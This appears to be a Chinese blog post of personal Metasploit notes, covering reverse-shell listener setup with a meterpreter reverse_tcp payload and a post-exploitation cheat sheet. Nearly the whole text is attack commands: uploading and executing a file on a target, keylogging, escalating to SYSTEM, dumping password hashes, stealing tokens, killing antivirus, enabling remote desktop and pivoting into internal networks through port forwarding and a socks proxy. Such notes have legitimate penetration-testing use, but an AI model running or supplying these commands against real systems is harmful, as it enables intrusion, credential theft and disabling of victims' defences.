msf使用记录

使用记录

参考资料
https://xz.aliyun.com/t/3007

得到会话,上传文件
    upload /root/360rd.exe  c:/ProgramData  	  大小写	# 上传文件到目标机上
执行exe
    execute 			#在目标机中执行文件
    execute -H -f cmd.exe 		# 创建新进程cmd.exe,-H不可见,-i交互
全局代理
set Proxies socks5:8.8.8.8:8787
建立监听
1 使用handler模块
msf > use exploit/multi/handler

2 设置payload
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp(当时windows时php换成windows)

PAYLOAD =>php/meterpreter/reverse_tcp

3 设置监听主机
msfexploit(multi/handler) > set LHOST 192.168.88.155
LHOST =>192.168.88.155

4 设置监听端口(默认4444)
msfexploit(multi/handler) > set LPORT 4444
LPORT => 4444

5 发动攻击
msfexploit(multi/handler) > exploit
Meterpreter后攻击
meterpreter > background  放回后台
meterpreter > exit  关闭会话
meterpreter > help  帮助信息
meterpreter > Sysinfo系统平台信息
meterpreter > screenshot  屏幕截取
meterpreter > shell  命令行shell (exit退出)
meterpreter > getlwd  查看本地目录
meterpreter > lcd  切换本地目录
meterpreter > getwd  查看目录
meterpreter > ls 查看文件目录列表
meterpreter > cd  切换目录 
meterpreter > rm  删除文件 
meterpreter > download C:\\Users\\123\\Desktop\\1.txt 1.txt 下载文件
meterpreter > upload /var/www/wce.exe wce.exe  上传文件
meterpreter > search -d c:  -f *.doc  搜索文件
meterpreter > execute -f  cmd.exe -i   执行程序/命令 
meterpreter > ps  查看进程
meterpreter > run post/windows/capture/keylog_recorder   键盘记录
meterpreter > getuid  查看当前用户权限
meterpreter > use priv  加载特权模块
meterpreter > getsystem  提升到SYSTEM权限
meterpreter > hashdump  导出密码散列
meterpreter > ps   查看高权限用户PID
meterpreter > steal_token <PID>  窃取令牌
meterpreter > rev2self  恢复原来的令牌 
meterpreter > migrate pid  迁移进程
meterpreter > run killav  关闭杀毒软件 
meterpreter > run getgui-e  启用远程桌面
meterpreter > portfwd add -l 1234 -p 3389 -r <目标IP>  端口转发
meterpreter > run get_local_subnets  获取内网网段信息
meterpreter > run autoroute -s <内网网段>  创建自动路由
meterpreter > run autoroute -p  查看自动路由表
创建代理通道:
msf > use auxiliary/server/socks4a   设置socks4代理模块
msf auxiliary(socks4a) > show options 
msf auxiliary(socks4a) > run
配置proxychains参数:
nano /etc/proxychains.conf   修改代理监听端口,和前面端口一致
quite_mode  设置成安静模式:去掉如下参数前面的注释
posted @ 2022-11-20 21:50  是谁走漏了消息  阅读(80)  评论(0编辑  收藏  举报